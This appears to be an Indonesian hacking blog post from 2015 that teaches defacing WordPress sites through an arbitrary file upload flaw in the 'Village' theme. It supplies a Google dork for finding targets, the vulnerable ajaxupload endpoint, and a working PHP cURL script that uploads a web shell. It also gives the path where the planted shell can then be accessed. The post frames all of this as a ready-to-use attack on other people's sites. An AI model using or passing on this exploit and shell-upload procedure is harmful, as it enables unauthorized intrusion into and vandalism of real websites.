Tuesday, 26 May 2015

Simple Deface WordPress Village theme Arbitary File Upload

xixixihi, Nuenomaru again
yosh ketemu lagi sama saya Nuenomaru Hanya ilusi :p wkwkw
langsung aja ya , gak sah banyak cingcong :p

Bahan-Bahan: 
-XAMPP (Search Di Google Banyak Kok, download sesuaikan spek PC sobat )
-Shell (Bisa dicari di google :3 )
- SourceCode upload
- Dork: inurl:/wp-content/themes/village 
(kembangin sendiri ya Dorknya, gunakan imajinasi mu mblo , maka dunia akan terbuka untuk mu wkwkw)

Langkah-Langkah:


1).Search Di Google Gunakan Dork inurl:/wp-content/themes/village

2).Jika Ketemu Masukan Exploit 
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php

3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}


4). Copy Script/SourceCode dibawah. simpan dengan ekstensi php (contoh.php)

<?php

$uploadfile="namashellagan.php";
$ch =
curl_init("http://www.target.co.li/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";


?>

NB: 
- ganti namashellagan.php menjadi nama shell milik anda (cth: kucing.php)
- http://www.target.co.li/ ganti dengan url web target yang ingin anda tusboled :v
- simpan semua script upload dan shell anda di Direktori C:/XAMPP/php


5). Aktifkan XAMPP Klik Start Pada Apache



6). Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7). ketikan:     cd C:/xampp/php
8). ketikan:     php namascriptupload.php
9). Jika Succes Akan : {"success" : true}

Liat penampakan dibawah:



Jika Berhasil tinggal panggil Shell sobat :p
bukan di BBM  , bukan di Telpon  , apa lagi di SMS 
tapi cukup dengan Mantra Shell Akses 

Mantra Shell Akses: 
target.com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashellanda.php 



Nah kalo udah kaya gambar diatas :v seterah mau sobat aapakan kek webnya :v
saran: hargai karya dan kerja keras webmasternya :) titip file and patch
Sekian Tutorial dari Nuenomaru.
Semoga bermanfaat >.<" , maaf bila ada kekurangan.



Nuenomaru

Nuenomaru just an illusion in Cyber World





Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2



EmoticonEmoticon